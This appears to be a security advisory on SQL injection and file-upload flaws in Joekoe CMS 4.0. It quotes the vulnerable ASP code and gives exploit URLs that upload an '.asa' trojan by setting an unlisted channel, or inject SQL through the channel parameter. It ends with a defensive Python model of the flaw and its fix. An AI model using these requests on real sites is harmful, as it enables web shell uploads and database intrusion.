Joekoe CMS 4.0 Injection Vulnerability

Source: Internet
Author: User
Affected Versions:
Joekoe CMS 4.0.
Detailed description:
Joekoe CMS 4.0 brings you a well-designed, unique and innovative system for member interaction and security, the best solution for a web site or business platform in a Windows NT service environment. Its well-designed architecture and function mechanism provide you with a secure, stable, efficient, and fast web site and integrated business platform solution from individual to enterprise application requirements.
In web.upload.asp:

...........
Sub doparseuploaddata()
    Dim tmpfilepath, tmpfiletype, tmpfilesize, tmpname
    ' All four values are taken from the upload request
    tmpfilepath = up.getfileinfo("file.path")
    tmpfiletype = up.getfileinfo("filetype")
    tmpfilesize = opscommon.toint(up.getfileinfo("filesize"))
    tmpname = up.getfileinfo("name")
    Dim tmpchannel, tmpdataid, tmptype, tmpsql, tmpid
    tmpchannel = upconfig.channel
    tmpdataid = 0
    tmptype = 0
    Select Case upconfig.channel
        Case "user.face"
            tmpdataid = upconfig.userid
            tmpchannel = "face"
            tmptype = 1
            tmpsql = "select top 1 u_id from db_sys_upload where nsort='" & tmpchannel & "' and iid=" & tmpdataid & ""
        Case "blog.logo"
            tmpdataid = toint(ops.client.getsession("user.blogid"))
            If tmpdataid < 1 Then tmpdataid = upconfig.userid
            tmpchannel = "blog"
            tmptype = 1
            tmpsql = "select top 1 u_id from db_sys_upload where nsort='" & tmpchannel & "' and iid=" & tmpdataid & ""
        Case Else
            ' Vulnerable: any other channel value lands here, and the file path
            ' is concatenated into the SQL string as-is
            tmpsql = "select top 1 u_id from db_sys_upload where u_url='" & tmpfilepath & "'"
    End Select
..........
Look at this statement: tmpsql = "select top 1 u_id from db_sys_upload where u_url='" & tmpfilepath & "'". The value of u_url comes from tmpfilepath, and tmpfilepath comes from up.getfileinfo("file.path"), so the file path is concatenated into the query without any escaping.

Reference:
Great Chan
http://blog.gsnsg.com/weblog/usual/
Solution:
http://www.joekoe.com/
Test method:

[Warning]

The following procedures (methods) may be offensive and are only for security research and teaching. You are at your own risk!

1. Upload vulnerability: this can be exploited by changing the channel variable to any value that is not equal to forum, user.face or blog.logo, and then changing filetype to asa to upload the trojan. The specific URL can be common/upload.asp?channel=use&filetype=asa&filename=&fileinput=u_face&formname=&thumbname=&thumbinput= and then upload.

2. SQL injection vulnerability: add a statement to the channel variable, for example common/upload.asp?channel=use'&filetype=gif&filename=&fileinput=u_face&formname=&thumbname=&thumbinput=

Joekoe CMS 4.0.
Error message:

select top 1 u_id from db_sys_upload where u_url='user'/20070722031234c.gif'

Original error:
Error #-2147217900, line 1: There is a syntax error near 'c'. Microsoft OLE DB Provider for SQL Server
Back to homepage
Processed in 0.188 s, 1 queries, 54 cache.
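
The failure above and its fix, as an added example that is not part of the original advisory or of Joekoe's code: a Python model that uses an in-memory sqlite3 table in place of SQL Server, with hypothetical function names and an assumed extension allowlist. It runs the concatenated lookup on the path from the error message, repeats it with a bound parameter, and checks channel and filetype against allowlists so that no request reaches a catch-all branch.

```python
import sqlite3

# Hypothetical allowlists: the two channels are the ones named in the code above,
# the extensions are an assumption made for this example.
ALLOWED_CHANNELS = {"user.face": "face", "blog.logo": "blog"}
ALLOWED_TYPES = {"gif", "jpg", "png"}

def make_db():
    """Constructed stand-in for db_sys_upload (sqlite3 instead of SQL Server)."""
    db = sqlite3.connect(":memory:")
    db.execute("create table db_sys_upload "
               "(u_id integer primary key, nsort text, iid integer, u_url text)")
    db.execute("insert into db_sys_upload (nsort, iid, u_url) "
               "values ('face', 7, 'face/20070722031234c.gif')")
    return db

def lookup_concat(db, file_path):
    """Same pattern as the 'Case Else' branch: the path is pasted into the SQL text."""
    sql = "select u_id from db_sys_upload where u_url='" + file_path + "' limit 1"
    return db.execute(sql).fetchone()

def lookup_param(db, file_path):
    """Hardened form: the path is sent as a bound parameter, never as SQL text."""
    sql = "select u_id from db_sys_upload where u_url = ? limit 1"
    return db.execute(sql, (file_path,)).fetchone()

def validate_request(channel, filetype):
    """Reject any channel or extension that is not on the allowlist."""
    if channel not in ALLOWED_CHANNELS:
        raise ValueError("unknown channel: %r" % channel)
    if filetype.lower() not in ALLOWED_TYPES:
        raise ValueError("file type not allowed: %r" % filetype)
    return ALLOWED_CHANNELS[channel]

def demo():
    db = make_db()
    bad_path = "user'/20070722031234c.gif"   # path shown in the error message above
    try:
        lookup_concat(db, bad_path)
        concat_result = "ok"
    except sqlite3.OperationalError:
        concat_result = "syntax error"       # the quote ends the string literal early
    return (concat_result,
            lookup_param(db, bad_path),                     # no row, no error
            lookup_param(db, "face/20070722031234c.gif"))   # the stored row

if __name__ == "__main__":
    print(demo())
```
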
